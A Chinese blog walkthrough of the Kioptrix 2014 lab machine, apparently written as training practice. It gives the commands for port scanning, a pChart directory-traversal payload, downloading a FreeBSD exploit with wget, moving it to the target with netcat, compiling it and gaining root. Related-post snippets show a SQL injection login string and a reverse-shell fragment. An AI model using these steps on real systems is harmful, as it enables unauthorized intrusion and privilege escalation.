Kioptrix 2014 (#5)

最新推荐文章于 2024-04-10 13:07:42 发布
最新推荐文章于 2024-04-10 13:07:42 发布
阅读量505 收藏 2
点赞数
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44146996/article/details/111033282
版权

目标:Kioptrix 2014 (#5)

攻击机:kali(192.168.1.107)

网关:192.168.1.255

 

#1端口探测

nmap 192.168.1.159 -O -sV -sS

-O 系统探测

-sV 探测开启的端口来获取服务、版本信息

-sS 使用SYN扫描

#2访问80和8080端口

查看网页源代码

访问

http://192.168.1.159/pChart2.1.3/examples/index.php

找一下Navigation漏洞

 

存在目录遍历漏洞

http://192.168.1.159/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

 

由于是apache,尝试读取apache配置

TIP1:https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout

/usr/local/etc/apache22/httpd.conf

需要使用固定的User-Agent

curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080

curl -H "User-Agent:Mozilla/4.0" http://192.168.1.159:8080/phptax

使用msf

 

#3提权

找一下exp

wget https://www.exploit-db.com/download/28718

发送端

nc -lvp 6666 < 28718

接收端

cd /tmp nc -nv 192.168.1.107 6666 >exploit.c

gcc exploit.c

./a.out

cd /root

ls -al

chmod 777 congrats.txt

cat congrats.txt

 

MD@@nr丫卡uer
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
KIOPTRIX: LEVEL 1.4-VulnHub靶机学习第六篇
qq_27466929的博客
09-15 1158
KIOPTRIX: LEVEL 1.4
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 1919
Oscp备考:Kioptrix Level 2
Vulnhub靶机:Kioptrix_2014
qq_48904485的博客
03-19 538
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 362
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
Vulnhub靶机:Kioptrix_2014,2024年最新美团网络安全开发工程师岗位职能要求
2401_84184567的博客
04-10 729
攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
OSCP-Kioptrix2014-2 漏洞利用
weixin_30383279的博客
06-28 360
pChart 2.1.3 文件包含漏洞 搜索漏洞 查看漏洞理由代码: hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd 之前的8080端口禁止访问,看看apache的配置: http://192.168.1.78/pChart2.1.3/examples/...
Kioptrix-1
qq_62066842的博客
03-29 345
vulnhub入门靶场Kioptrix系列练习
vuInhub靶场实战系列-Kioptrix Level #2
06-09
vuInhub靶场实战系列-Kioptrix Level #2
vuInhub靶场实战系列-Kioptrix Level #1
06-08
vuInhub靶场实战系列-Kioptrix Level #1
vuInhub靶场实战系列-Kioptrix Level #4
最新发布
06-12
vuInhub靶场实战系列-Kioptrix Level #4
vuInhub靶场实战系列-Kioptrix Level #3
06-10
vuInhub靶场实战系列-Kioptrix Level #3
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix_level_2 新手入门攻略
qq_58683895的博客
09-16 181
使用命令注入及漏洞提权攻略靶机,过程较为完整
OSCP-Kioptrix2014-3 后渗透测试
weixin_30316097的博客
06-28 228
拿到root权限 之前的努力,最终获得了两个session 尝试看看该操作系统的漏洞 kali: searchsploit freebsd 9.0 cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/ cd Desktop/ nc -lp 5656 < 28718.c -q 1 msf ...
Vunlnhub之Kioptrix渗透实战
weixin_43862283的博客
05-03 407
Kioptrix渗透实战 1、环境简介 难度:简单 网络:桥接自动分配IP地址 2、主机发现 nmap -sP 192.168.34.0/24 3、漏洞发现 访问主页面,是一个登录界面,尝试使用万能用户名登录 1' or 1=1# 4、命令执行,反弹shell 返回一个框,ping目标主机,存在命令注入漏洞 kali监听,bash反弹shell bash -i >& ...
[VulnHub靶机渗透] Kioptrix1.2
人若无名,便可专心练剑
03-22 1244
Kioptrix1.2这台靶机涉及LotusCMS公开漏洞利用,配置文件敏感信息枚举,mysql数据库信息搜集,使用john暴力破解md5哈希,使用ht编辑器修改sudoers文件提权等综合知识和技能。机器不难,攻击链很标准,是一台锻炼攻击思路的好靶机。
Vulnhub系列-Kioptrix-Level-5
Yasso的博客
12-22 312
靶机:192.168.249.134 kali: 192.168.249.132 一、信息收集 ufs:/dev/ada0p2 —指定根分区启动系统 这样指定根分区启动成功 –靶机变为login才算打开— nmap -sV 192.168.249.134 —查看开放端口 —访问下80端口— <查看源代码> <看到URL访问下> —搜下有无pChart 2.1.3的漏洞— <貌似是个目录遍历漏洞和xss,看下exp怎么利用> 先玩玩XSS,刚开始以为是反射型 测试
渗透测试攻防练习实验室 (资源分享,国外在线教程)
热门推荐
关注互联网安全的小虾米一枚
07-26 2万+
Vulnerable Web Applications Vulnerable Web Applications BadStore http://www.badstore.net/ BodgeIt Store http://code.google.com/p/bodgeit/ Butterfly Security Project ht
Kioptrix Level 1 靶机wp
m0_52496313的博客
08-10 1007
Kioptrix Level 1 靶机wp
OSCP Like Vulns Machines.pdf
10-06
Kioptrix 2014则进一步深化了学习者的理解和实践。此外,还有其他虚拟机如FristiLeaks 1.3、Stapler 1、VulnOS 2、SickOs 1.2等,它们涵盖了不同的主题,比如文件系统漏洞、Web应用漏洞以及恶意软件分析等。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值